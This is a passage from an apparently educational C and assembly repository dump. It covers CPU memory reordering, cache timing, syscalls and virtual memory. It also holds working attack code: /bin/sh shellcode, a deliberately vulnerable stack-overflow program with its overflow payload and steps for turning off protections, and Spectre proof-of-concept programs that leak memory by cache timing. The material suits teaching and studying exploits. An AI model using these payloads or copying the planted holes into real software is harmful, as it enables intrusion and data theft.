OEM Data valid bit 1314 | ULONGLONG OemDevicePath:1; // 7: OEM Device Path valid bit 1315 | ULONGLONG Reserved:56; // 63-8: Reserved 1316 | } DUMMYSTRUCTNAME; 1317 | } ERROR_PLATFORM_BUS_VALID, *PERROR_PLATFORM_BUS_VALID; 1318 | 1319 | typedef struct _ERROR_PLATFORM_BUS { 1320 | ERROR_SECTION_HEADER Header; 1321 | ERROR_PLATFORM_BUS_VALID Valid; 1322 | ERROR_STATUS ErrorStatus; // Bus Error Status 1323 | ULONGLONG RequestorId; // Bus Requester ID at the time of the event 1324 | ULONGLONG ResponderId; // Bus Responder ID at the time of the event 1325 | ULONGLONG TargetId; // Bus intended Target ID at the time of the event 1326 | ERROR_BUS_SPECIFIC_DATA BusSpecificData; // OEM specific Bus dependent data 1327 | UCHAR OemId[16]; // OEM specific data for bus identification 1328 | ERROR_OEM_DATA OemData; // OEM specific data 1329 | #if 0 1330 | UCHAR OemDevicePath[/* 16 ? */]; // OEM specific vendor device path. 1331 | #endif // 0 1332 | } ERROR_PLATFORM_BUS, *PERROR_PLATFORM_BUS; 1333 | 1334 | // 1335 | // IA64 ERRORS: Platform Host Controller error device definitions 1336 | // 1337 | 1338 | #define ERROR_PLATFORM_HOST_CONTROLLER_GUID \ 1339 | { 0xe429faf8, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }} 1340 | 1341 | 1342 | typedef union _ERROR_PLATFORM_HOST_CONTROLLER_VALID { 1343 | ULONGLONG Valid; 1344 | struct { // Bits: 1345 | ULONGLONG ErrorStatus:1; // 0: Error Status valid bit 1346 | ULONGLONG RequestorId:1; // 1: Requester Identifier valid bit 1347 | ULONGLONG ResponderId:1; // 2: Responder Identifier valid bit 1348 | ULONGLONG TargetId:1; // 3: Target Identifier valid bit 1349 | ULONGLONG BusSpecificData:1; // 4: Bus Specific Data valid bit 1350 | ULONGLONG OemId:1; // 5: OEM Identification valid bit 1351 | ULONGLONG OemData:1; // 6: OEM Data valid bit 1352 | ULONGLONG OemDevicePath:1; // 7: OEM Device Path valid bit 1353 | ULONGLONG Reserved:56; // 63-8: Reserved 1354 | } DUMMYSTRUCTNAME; 1355 | } ERROR_PLATFORM_HOST_CONTROLLER_VALID, *PERROR_PLATFORM_HOST_CONTROLLER_VALID; 1356 | 1357 | typedef struct _ERROR_PLATFORM_HOST_CONTROLLER { 1358 | ERROR_SECTION_HEADER Header; 1359 | ERROR_PCI_COMPONENT_VALID Valid; 1360 | ERROR_STATUS ErrorStatus; // Host Controller Error Status 1361 | ULONGLONG RequestorId; // Host controller Requester ID at the time of the event 1362 | ULONGLONG ResponderId; // Host controller Responder ID at the time of the event 1363 | ULONGLONG TargetId; // Host controller intended Target ID at the time of the event 1364 | ERROR_BUS_SPECIFIC_DATA BusSpecificData; // OEM specific Bus dependent data 1365 | UCHAR OemId[16]; // OEM specific data for bus identification 1366 | ERROR_OEM_DATA OemData; // OEM specific data 1367 | #if 0 1368 | UCHAR OemDevicePath[/* 16 ? */]; // OEM specific vendor device path. 1369 | #endif // 0 1370 | } ERROR_PLATFORM_HOST_CONTROLLER, *PERROR_PLATFORM_HOST_CONTROLLER; 1371 | 1372 | // 1373 | // IA64 ERROR_LOGRECORDS definitions 1374 | // 1375 | // MCA_EXCEPTION, 1376 | // CMC_EXCEPTION, 1377 | // CPE_EXCEPTION. 1378 | // 1379 | 1380 | // For compatibility with previous versions of the definitions: 1381 | typedef ERROR_RECORD_HEADER ERROR_LOGRECORD, *PERROR_LOGRECORD; 1382 | 1383 | typedef ERROR_RECORD_HEADER MCA_EXCEPTION, *PMCA_EXCEPTION; // Machine Check Abort 1384 | typedef ERROR_RECORD_HEADER CMC_EXCEPTION, *PCMC_EXCEPTION; // Corrected Machine Check 1385 | typedef ERROR_RECORD_HEADER CPE_EXCEPTION, *PCPE_EXCEPTION; // Corrected Platform Error 1386 | #if (NTDDI_VERSION > NTDDI_WINXP) 1387 | typedef ERROR_RECORD_HEADER INIT_EXCEPTION, *PINIT_EXCEPTION; // Init Event 1388 | #endif 1389 | 1390 | #endif // _IA64_ 1391 | 1392 | #elif defined(_ARM_) || defined(_ARM64_) 1393 | 1394 | // _ARM_WORKITEM_ MCE support 1395 | 1396 | typedef struct _MCA_EXCEPTION { 1397 | 1398 | ULONG Dummy; 1399 | } MCA_EXCEPTION, *PMCA_EXCEPTION; 1400 | 1401 | #endif // defined(_X86_) || defined(_IA64_) || defined(_AMD64_) 1402 | 1403 | #if _MSC_VER >= 1200 1404 | #pragma warning(pop) 1405 | #endif 1406 | 1407 | #endif // _MCE_ 1408 | 1409 | 1410 | -------------------------------------------------------------------------------- /source/meltdown/winDriver/ntoskrnl.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/source/meltdown/winDriver/ntoskrnl.lib -------------------------------------------------------------------------------- /source/mfence-win.cpp: -------------------------------------------------------------------------------- 1 | //Build with Visual Studio choose:X86 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | int v1, v2, r1, r2; 8 | HANDLE start1, start2, complete; 9 | 10 | void thread1() 11 | { 12 | while (true) 13 | { 14 | WaitForSingleObject(start1, INFINITE); //wait for start 15 | v1 = 1; 16 | 17 | //__asm { mfence } 18 | 19 | r1 = v2; 20 | ReleaseSemaphore(complete, 1, NULL); //complete & trigger a signal 21 | } 22 | } 23 | 24 | void thread2() 25 | { 26 | while (true) 27 | { 28 | WaitForSingleObject(start2, INFINITE); //wait for start 29 | v2 = 1; 30 | 31 | //__asm { mfence } 32 | 33 | r2 = v1; 34 | ReleaseSemaphore(complete, 1, NULL); //complete & trigger a signal 35 | } 36 | } 37 | 38 | int main() 39 | { 40 | start1 = CreateSemaphore(NULL, 0, 1, NULL); 41 | start2 = CreateSemaphore(NULL, 0, 1, NULL); 42 | complete = CreateSemaphore(NULL, 0, 2, NULL); 43 | 44 | std::thread t1(thread1); 45 | std::thread t2(thread2); 46 | 47 | for (int i = 0; i < 300000; i++) 48 | { 49 | v1 = v2 = 0; 50 | 51 | ReleaseSemaphore(start1, 1, NULL); //start t1 52 | ReleaseSemaphore(start2, 1, NULL); //start t2 53 | 54 | //wait for t1&t2 completion 55 | WaitForSingleObject(complete, INFINITE); 56 | WaitForSingleObject(complete, INFINITE); 57 | 58 | if ((r1 == 0) && (r2 == 0)) 59 | { 60 | printf("reorder detected @ %d\n", i); 61 | } 62 | } 63 | 64 | t1.detach(); 65 | t2.detach(); 66 | } 67 | -------------------------------------------------------------------------------- /source/mfence.cpp: -------------------------------------------------------------------------------- 1 | //g++ mfence.cpp --std=c++20 -lpthread 2 | //g++ mfence.cpp --std=c++20 -lpthread -O3 3 | #include 4 | #include 5 | #include 6 | 7 | int v1, v2, r1, r2; 8 | sem_t start1, start2, complete; 9 | 10 | void thread1() 11 | { 12 | while(true) 13 | { 14 | sem_wait(&start1); //wait for start 15 | v1 = 1; 16 | 17 | //asm ("mfence" ::: "memory"); 18 | 19 | r1 = v2; 20 | sem_post(&complete); //complete & trigger a signal 21 | } 22 | } 23 | 24 | void thread2() 25 | { 26 | while(true) 27 | { 28 | sem_wait(&start2); //wait for start 29 | v2 = 1; 30 | 31 | //asm ("mfence" ::: "memory"); 32 | 33 | r2 = v1; 34 | sem_post(&complete); //complete & trigger a signal 35 | } 36 | } 37 | 38 | int main() 39 | { 40 | sem_init(&start1, 0, 0); 41 | sem_init(&start2, 0, 0); 42 | sem_init(&complete, 0, 0); 43 | 44 | std::thread t1(thread1); 45 | std::thread t2(thread2); 46 | 47 | for(int i = 0; i < 300000; i++) 48 | { 49 | v1 = v2 = 0; 50 | 51 | sem_post(&start1); //start t1 52 | sem_post(&start2); //start t2 53 | 54 | //wait for t1&t2 completion 55 | sem_wait(&complete); 56 | sem_wait(&complete); 57 | 58 | if((r1 == 0) && (r2 == 0)) 59 | { 60 | printf("reorder detected @ %d\n", i); 61 | } 62 | } 63 | 64 | t1.detach(); 65 | t2.detach(); 66 | } 67 | -------------------------------------------------------------------------------- /source/prediction.c: -------------------------------------------------------------------------------- 1 | //Build with Visual Studio command prompt: cl.exe prediction.c 2 | //Build with GCC: gcc prediction.c 3 | 4 | #ifdef _MSC_VER 5 | #include 6 | #else 7 | #include 8 | #endif 9 | #include 10 | #include 11 | #include 12 | 13 | #define PAGE_NUM 256 14 | #define CACHE_HIT_THRESHOLD 100 15 | 16 | int get_access_time(uint8_t* page) 17 | { 18 | unsigned long long tick1, tick2; 19 | unsigned int aux; 20 | 21 | tick1 = __rdtscp(&aux); 22 | uint8_t tmp = *page; 23 | tick2 = __rdtscp(&aux); 24 | 25 | return (tick2 - tick1); 26 | } 27 | 28 | static uint8_t mem_pages[PAGE_NUM][1024 * 4]; 29 | 30 | int detect_cached_page() 31 | { 32 | //find the pages which in cache. Order is lightly mixed up to prevent stride prediction 33 | for (int i = 0; i < PAGE_NUM; i++) 34 | { 35 | uint8_t mix_i = ((i * 167) + 13) & 255; 36 | if (get_access_time(mem_pages[mix_i]) < CACHE_HIT_THRESHOLD) 37 | { 38 | return mix_i; 39 | } 40 | } 41 | 42 | return -1; 43 | } 44 | 45 | int data = 100; 46 | 47 | int main() 48 | { 49 | memset(mem_pages, 1, sizeof(mem_pages)); 50 | 51 | for(int i = 0; i < 30; i++) 52 | { 53 | _mm_clflush(&data); 54 | for (int i = 0; i < PAGE_NUM; i++) 55 | { 56 | _mm_clflush(mem_pages[i]); 57 | } 58 | 59 | if(data == 0) 60 | { 61 | data = mem_pages[37][0]; 62 | } 63 | 64 | int cached_page = detect_cached_page(); 65 | 66 | printf("cached page:%d, data: %d\n", cached_page, data); 67 | } 68 | } 69 | -------------------------------------------------------------------------------- /source/setjmp-longjmp.c: -------------------------------------------------------------------------------- 1 | //gcc setjmp-longjmp.c 2 | 3 | #include 4 | 5 | __attribute__((naked,returns_twice)) 6 | int my_setjmp(void* context) 7 | { 8 | asm("mov %%rbp, (%%rdi);" 9 | "mov %%rsp, 8(%%rdi);" 10 | "mov (%%rsp), %%rax;" 11 | "mov %%rax, 16(%%rdi);" 12 | "mov $0, %%rax;" 13 | "ret;" 14 | :::); 15 | } 16 | 17 | __attribute__((naked,noreturn)) 18 | void my_longjmp(void* context, int value) 19 | { 20 | asm("mov (%%rdi), %%rbp;" 21 | "mov 8(%%rdi), %%rsp;" 22 | "mov %%rsi, %%rax;" 23 | "jmp 16(%%rdi);" 24 | :::); 25 | } 26 | 27 | long context[3]; 28 | 29 | void func2() 30 | { 31 | printf("func2 start\n"); 32 | my_longjmp(context, 100); 33 | printf("func2 return\n"); 34 | } 35 | 36 | void func1() 37 | { 38 | printf("func1 start\n"); 39 | func2(); 40 | printf("func1 return\n"); 41 | } 42 | 43 | int main() 44 | { 45 | printf("main start\n"); 46 | int value = my_setjmp(context); 47 | if(value == 0 ) 48 | { 49 | func1(); 50 | } 51 | printf("main return\n"); 52 | return value; 53 | } 54 | -------------------------------------------------------------------------------- /source/shellcode/injectShellcode.c: -------------------------------------------------------------------------------- 1 | //echo 0 > /proc/sys/kernel/randomize_va_space 2 | //gcc -fno-stack-protector -z execstack injectShellcode.c 3 | //./a.out and input: shellcode.bin 4 | //./a.out and input: shellcodeSled.bin 5 | 6 | //Make sure the content of shellcode.bin is like this: 7 | char shellcode[] = "\xbe\x00\x00\x00\x00\xba\x00\x00\x00\x00\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\xb8\x3b\x00\x00\x00\x0f\x05\x00"//Shellcode here; add 0x00 for 64-bit (8-byte) alignment. 8 | "\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc" // RBP is here; no impact on shellcode. 9 | "\xd0\xe2\xff\xff\xff\x7f\x00\x00";// The return address is here and should be changed to the address of the shellcode (i.e., the address of the vulnerableBuffer array). Please update the value if the address on your machine is different. 10 | 11 | //Input shellcode via the keyboard and update the address of the shellcode if necessary. 12 | //echo -ne '\xbe\x00\x00\x00\x00\xba\x00\x00\x00\x00\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\xb8\x3b\x00\x00\x00\x0f\x05\x00\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xd0\xe2\xff\xff\xff\x7f\x00\x00' | ./a.out 13 | 14 | #include 15 | 16 | int readFile(const char* path, unsigned char* vulnerableBuffer) 17 | { 18 | FILE* file = fopen(path, "rb"); 19 | if (file == NULL) { 20 | perror("Error opening file"); 21 | return 1; 22 | } 23 | 24 | // Move to the end to get file size 25 | fseek(file, 0, SEEK_END); 26 | long fileSize = ftell(file);// fileSize = 48, the vulnerableBuffer will overflow. 27 | rewind(file); // Reset file pointer to beginning 28 | 29 | // The vulnerableBuffer overflows here 30 | if(fileSize != fread(vulnerableBuffer, 1, fileSize, file)) 31 | { 32 | perror("Error fread"); 33 | } 34 | } 35 | 36 | char fileName[32]; 37 | void vulnerableFunction() 38 | { 39 | unsigned char vulnerableBuffer[32]; 40 | printf("Load the file at: %p\nPlease enter the file name:", vulnerableBuffer); 41 | gets(fileName); 42 | readFile(fileName, vulnerableBuffer); 43 | }// will run shellcode.bin here. 44 | 45 | int main() 46 | { 47 | vulnerableFunction(); 48 | printf("Bye👋\n"); 49 | } 50 | -------------------------------------------------------------------------------- /source/shellcode/shellcode-non-zero.s: -------------------------------------------------------------------------------- 1 | # 1) apt install nasm 2 | # 2) nasm -f elf64 shellcode-non-zero.s && ld shellcode-non-zero.o 3 | # 3) ./a.out 4 | # 4) objdump -d shellcode-non-zero.o 5 | 6 | section .text 7 | global _start 8 | _start: 9 | xor rsi, rsi ;arg1 10 | xor rdx, rdx ;arg2 11 | 12 | mov rbx, 0x7768732f6e69622f ;rbx = "/bin/shw" 13 | sal rbx, 8 14 | shr rbx, 8 ;rbx = "/bin/sh" 15 | 16 | push rbx 17 | mov rdi, rsp ;arg0 = address of "/bin/sh" 18 | 19 | mov al, 0x3b 20 | syscall 21 | -------------------------------------------------------------------------------- /source/shellcode/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/source/shellcode/shellcode.bin -------------------------------------------------------------------------------- /source/shellcode/shellcode.c: -------------------------------------------------------------------------------- 1 | //gcc -z execstack shellcode.c 2 | //a.out 3 | 4 | int main() 5 | { 6 | unsigned char shellcode[] = "\xbe\x00\x00\x00\x00\xba\x00\x00\x00\x00\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\xb8\x3b\x00\x00\x00\x0f\x05"; 7 | 8 | //unsigned char shellcodeNonZero[] = "\x48\x31\xf6\x48\x31\xd2\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x77\x48\xc1\xe3\x08\x48\xc1\xeb\x08\x53\x48\x89\xe7\xb0\x3b\x0f\x05"; 9 | 10 | void (*exec)() = (void(*)())shellcode; 11 | exec(); 12 | } 13 | -------------------------------------------------------------------------------- /source/shellcode/shellcode.s: -------------------------------------------------------------------------------- 1 | # 1) apt install nasm 2 | # 2) nasm -f elf64 shellcode.s && ld shellcode.o 3 | # 3) ./a.out 4 | # 4) objdump -d shellcode.o 5 | 6 | section .text 7 | global _start 8 | _start: 9 | mov rsi, 0 ;arg1 10 | mov rdx, 0 ;arg2 11 | 12 | mov rbx, 0x68732f6e69622f ;"/bin/sh" 13 | push rbx 14 | mov rdi, rsp ;arg0 = "/bin/sh" 15 | 16 | mov rax, 0x3b 17 | syscall 18 | -------------------------------------------------------------------------------- /source/shellcode/shellcodeSled.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/source/shellcode/shellcodeSled.bin -------------------------------------------------------------------------------- /source/spectre/spectre-ii.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #ifdef _MSC_VER 5 | #include /* for rdtscp and clflush */ 6 | #pragma optimize("gt",on) 7 | #else 8 | #include /* for rdtscp and clflush */ 9 | #endif 10 | 11 | #define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */ 12 | 13 | uint8_t array[16] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 }; 14 | uint8_t mem_pages[256][4096]; 15 | 16 | void victim_function(size_t index) 17 | { 18 | _mm_clflush(array); 19 | for (volatile int z = 0; z < 100; z++); 20 | 21 | uint8_t temp = 0; 22 | if (index < sizeof(array)) 23 | { 24 | temp = mem_pages[array[index]][0]; 25 | } 26 | } 27 | 28 | void speculative_execution(uint8_t* target, int tries) 29 | { 30 | register int offset_to_array = (target - array); 31 | register size_t training_x, index; 32 | training_x = tries % sizeof(array); 33 | for (int i = 0; i < 30; i++) 34 | { 35 | index = ((i % (sizeof(array)/2)) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */ 36 | index = (index | (index >> sizeof(array))); /* Set x=-1 if j&6=0, else x=0 */ 37 | index = training_x ^ (index & (offset_to_array ^ training_x)); 38 | victim_function(index); 39 | } 40 | } 41 | 42 | uint8_t get_best_result(int results[256]) 43 | { 44 | uint8_t ret = '?'; 45 | int max = 0; 46 | for (int i = 0; i < 256; i++) 47 | { 48 | if (results[i] > max) 49 | { 50 | max = results[i]; 51 | ret = i; 52 | } 53 | } 54 | 55 | return ret; 56 | } 57 | 58 | void detect_cached_page(int results[256]) 59 | { 60 | /* Time reads. Order is lightly mixed up to prevent stride prediction */ 61 | int junk; 62 | for (int i = 0; i < 256; i++) { 63 | int mix_i = ((i * 167) + 13) & 255; 64 | volatile uint8_t* addr = mem_pages[mix_i]; 65 | register uint64_t time1 = __rdtscp(&junk); /* READ TIMER */ 66 | junk = *addr; /* MEMORY ACCESS TO TIME */ 67 | register uint64_t time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */ 68 | if (time2 <= CACHE_HIT_THRESHOLD) 69 | results[mix_i]++; /* cache hit - add +1 to score for this value */ 70 | } 71 | } 72 | 73 | uint8_t probe(char* target) 74 | { 75 | static int results[256]; 76 | int tries, i, j, k, mix_i, junk = 0; 77 | 78 | for (i = 0; i < 256; i++) 79 | results[i] = 0; 80 | for (tries = 0; tries < 999; tries++) 81 | { 82 | for (i = 0; i < 256; i++) 83 | { 84 | _mm_clflush(mem_pages[i]); 85 | } 86 | 87 | speculative_execution(target, tries); 88 | 89 | detect_cached_page(results); 90 | } 91 | 92 | return get_best_result(results); 93 | } 94 | 95 | char *secret = "Hello, Abu coding!"; 96 | 97 | int main() 98 | { 99 | int i, score[2], len=18; 100 | uint8_t value[2]; 101 | 102 | for (i = 0; i < sizeof(mem_pages); i++) 103 | mem_pages[0][i] = 1; /* write to mem_pages so in RAM not copy-on-write zero pages */ 104 | 105 | while (--len >= 0) 106 | { 107 | uint8_t ret = probe(secret++); 108 | printf("%c ", ret); 109 | } 110 | printf("\n"); 111 | } -------------------------------------------------------------------------------- /source/spectre/spectre-iii.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #ifdef _MSC_VER 5 | #include /* for rdtscp and clflush */ 6 | #pragma optimize("gt",on) 7 | #else 8 | #include /* for rdtscp and clflush */ 9 | #endif 10 | 11 | /******************************************************************** 12 | Victim code. 13 | ********************************************************************/ 14 | unsigned int array1_size = 16; 15 | uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 }; 16 | uint8_t mem_pages[256 * 512]; 17 | 18 | char *secret = "The Magic Words are Squeamish Ossifrage."; 19 | 20 | uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */ 21 | 22 | void victim_function(size_t x) { 23 | if (x < array1_size) { 24 | temp = mem_pages[array1[x] * 512]; 25 | } 26 | } 27 | 28 | #define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */ 29 | 30 | /* Report best guess in value[0] and runner-up in value[1] */ 31 | void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) { 32 | static int results[256]; 33 | int tries, i, j, k, mix_i, junk = 0; 34 | size_t training_x, x; 35 | register uint64_t time1, time2; 36 | volatile uint8_t *addr; 37 | 38 | for (i = 0; i < 256; i++) 39 | results[i] = 0; 40 | for (tries = 999; tries > 0; tries--) { 41 | 42 | /* Flush mem_pages[256*(0..255)] from cache */ 43 | for (i = 0; i < 256; i++) 44 | _mm_clflush(&mem_pages[i * 512]); /* intrinsic for clflush instruction */ 45 | 46 | /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */ 47 | training_x = tries % array1_size; 48 | for (j = 29; j >= 0; j--) { 49 | _mm_clflush(&array1_size); 50 | for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */ 51 | 52 | /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */ 53 | /* Avoid jumps in case those tip off the branch predictor */ 54 | x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */ 55 | x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */ 56 | x = training_x ^ (x & (malicious_x ^ training_x)); 57 | 58 | /* Call the victim! */ 59 | victim_function(x); 60 | } 61 | 62 | /* Time reads. Order is lightly mixed up to prevent stride prediction */ 63 | for (i = 0; i < 256; i++) { 64 | mix_i = ((i * 167) + 13) & 255; 65 | addr = &mem_pages[mix_i * 512]; 66 | time1 = __rdtscp(&junk); /* READ TIMER */ 67 | junk = *addr; /* MEMORY ACCESS TO TIME */ 68 | time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */ 69 | if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size]) 70 | results[mix_i]++; /* cache hit - add +1 to score for this value */ 71 | } 72 | 73 | /* Locate highest & second-highest results results tallies in j/k */ 74 | j = k = -1; 75 | for (i = 0; i < 256; i++) { 76 | if (j < 0 || results[i] >= results[j]) { 77 | k = j; 78 | j = i; 79 | } else if (k < 0 || results[i] >= results[k]) { 80 | k = i; 81 | } 82 | } 83 | if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0)) 84 | break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */ 85 | } 86 | results[0] ^= junk; /* use junk so code above won’t get optimized out*/ 87 | value[0] = (uint8_t)j; 88 | score[0] = results[j]; 89 | value[1] = (uint8_t)k; 90 | score[1] = results[k]; 91 | } 92 | 93 | int main(int argc, const char **argv) { 94 | size_t malicious_x=(size_t)(secret-(char*)array1); /* default for malicious_x */ 95 | int i, score[2], len=40; 96 | uint8_t value[2]; 97 | 98 | for (i = 0; i < sizeof(mem_pages); i++) 99 | mem_pages[i] = 1; /* write to mem_pages so in RAM not copy-on-write zero pages */ 100 | 101 | while (--len >= 0) { 102 | printf("Reading at malicious_x = %p... ", (void*)malicious_x); 103 | readMemoryByte(malicious_x++, value, score); 104 | printf("%s: ", (score[0] >= 2*score[1] ? "Success" : "Unclear")); 105 | printf("0x%02X=’%c’ score=%d ", value[0], 106 | (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]); 107 | if (score[1] > 0) 108 | printf("(second best: 0x%02X score=%d)", value[1], score[1]); 109 | printf("\n"); 110 | } 111 | return (0); 112 | } -------------------------------------------------------------------------------- /source/spectre/spectre.c: -------------------------------------------------------------------------------- 1 | //Build with Visual Studio command prompt: cl.exe spectre.c 2 | //Build with GCC: gcc spectre.c 3 | 4 | #ifdef _MSC_VER 5 | #include 6 | #pragma optimize("gt",on) 7 | #else 8 | #include 9 | #endif 10 | #include 11 | #include 12 | #include 13 | 14 | #define PAGE_NUM 256 15 | #define CACHE_HIT_THRESHOLD 100 16 | 17 | uint8_t array[16] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 }; 18 | uint8_t mem_pages[PAGE_NUM][4096]; 19 | 20 | void do_speculative_execution(size_t index) 21 | { 22 | _mm_clflush(array); 23 | for (volatile int z = 0; z < 100; z++); 24 | 25 | if (index < sizeof(array)) 26 | { 27 | mem_pages[array[index]][0] = 0; 28 | } 29 | } 30 | 31 | void speculative_execution(uint8_t* target, int tries) 32 | { 33 | register int offset_to_array = (target - array); 34 | register size_t training_x, index; 35 | training_x = tries % sizeof(array); 36 | for (int i = 0; i < 60; i++) 37 | { 38 | index = ((i % (sizeof(array)/2)) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */ 39 | index = (index | (index >> sizeof(array))); /* Set x=-1 if j&6=0, else x=0 */ 40 | index = training_x ^ (index & (offset_to_array ^ training_x)); 41 | do_speculative_execution(index); 42 | } 43 | } 44 | 45 | int get_access_time(uint8_t* page) 46 | { 47 | unsigned long long tick1, tick2; 48 | unsigned int aux; 49 | 50 | tick1 = __rdtscp(&aux); 51 | uint8_t tmp = *page; 52 | tick2 = __rdtscp(&aux); 53 | 54 | return (tick2 - tick1); 55 | } 56 | 57 | void detect_cached_page(int results[PAGE_NUM]) 58 | { 59 | int min_time = 10000000; 60 | int cached_page_index = -1; 61 | for (int i = 0; i < PAGE_NUM; i++) 62 | { 63 | //Order is lightly mixed up to prevent stride prediction 64 | int mixed_i = ((i * 167) + 13) & 255; 65 | int access_time = get_access_time(mem_pages[mixed_i]); 66 | if (min_time > access_time) 67 | { 68 | min_time = access_time; 69 | cached_page_index = mixed_i; 70 | } 71 | } 72 | 73 | if(-1 != cached_page_index) 74 | { 75 | results[cached_page_index]++; 76 | } 77 | } 78 | 79 | uint8_t get_best_result(int results[PAGE_NUM]) 80 | { 81 | uint8_t ret = '?'; 82 | int max = 0; 83 | for (int i = 0; i < PAGE_NUM; i++) 84 | { 85 | if (results[i] > max) 86 | { 87 | max = results[i]; 88 | ret = i; 89 | } 90 | } 91 | 92 | if(ret < 32 || ret > 126) ret = 'x'; 93 | //printf("%c, score: %d\n", ret, results[ret]); 94 | return ret; 95 | } 96 | 97 | uint8_t probe(uint8_t* target) 98 | { 99 | int results[PAGE_NUM]; 100 | memset(results, 0, sizeof(results)); 101 | 102 | for (int tries = 0; tries < 300; tries++) 103 | { 104 | for (int i = 0; i < PAGE_NUM; i++) 105 | { 106 | _mm_clflush(mem_pages[i]); 107 | } 108 | 109 | speculative_execution(target, tries); 110 | 111 | detect_cached_page(results); 112 | } 113 | 114 | return get_best_result(results); 115 | } 116 | 117 | char *secret = "Hello"; 118 | 119 | int main() 120 | { 121 | memset(mem_pages, 1, sizeof(mem_pages)); 122 | 123 | int len = strlen(secret); 124 | 125 | printf("secret = ");//sleep(1); 126 | 127 | for(int i = 0; i < len; i++) 128 | { 129 | printf("%c", probe(&secret[i])); 130 | } 131 | printf("\n"); 132 | } 133 | -------------------------------------------------------------------------------- /source/syscall.s: -------------------------------------------------------------------------------- 1 | # 1) apt install nasm 2 | # 2) nasm -f elf64 syscall.s && ld syscall.o 3 | # 3) ./a.out 4 | 5 | section .text 6 | global _start 7 | _start: 8 | mov rdi, 1 ;arg0 9 | mov rdx, 8 ;arg2 10 | mov rbx, 0x0a646c726f576948 ;arg1 = HiWorld\n 11 | ;mov rbx, 0x0a83989ff03a6948 ;arg1 = Hi:😃\n 12 | push rbx 13 | mov rsi, rsp 14 | mov rax, 1 15 | syscall 16 | 17 | mov rax, 60 ;exit 18 | syscall 19 | 20 | -------------------------------------------------------------------------------- /source/virtualMemory.c: -------------------------------------------------------------------------------- 1 | //step 1: echo 0 > /proc/sys/kernel/randomize_va_space 2 | //step 2: gcc virtualMemory.c -o p1 && ./p1 3 | //step 3: int a = 2; 4 | //step 4: gcc virtualMemory.c -o p2 && ./p2 5 | //we will see the same address, but the value is different. 6 | 7 | #include 8 | 9 | int a = 1;//or 2 10 | int main() 11 | { 12 | printf("address: %p, value: %d\n", &a, a); 13 | } 14 | --------------------------------------------------------------------------------